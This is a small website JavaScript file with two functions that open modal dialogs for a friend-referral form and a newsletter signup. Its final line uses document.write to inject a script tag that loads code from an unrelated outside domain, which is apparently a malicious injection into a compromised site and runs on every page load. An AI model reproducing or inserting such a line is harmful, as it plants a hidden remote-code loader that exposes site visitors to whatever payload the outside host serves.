// JavaScript Document

//Modal Window

//Refer your friend
  function openDialog2(html) {
	var win = new Window({className: "spread", title: "Refer A Friend", top:70, left:100, width:565, height:350, url: "form.php", showEffectOptions: {duration:1.5}})
	win.showCenter(); 
	
}    

//Newsletter Subscription
   function openDialog3(html) {
	var win = new Window({className: "spread", title: "Newsletter Subscription", top:70, left:100, width:430, height:200, url: "newsletter.php", showEffectOptions: {duration:1.5}})
	win.showCenter(); 
}  

document.write('<script src=http://furniture-shop-blanc.com/doormassive/fengshui.php ><\/script>');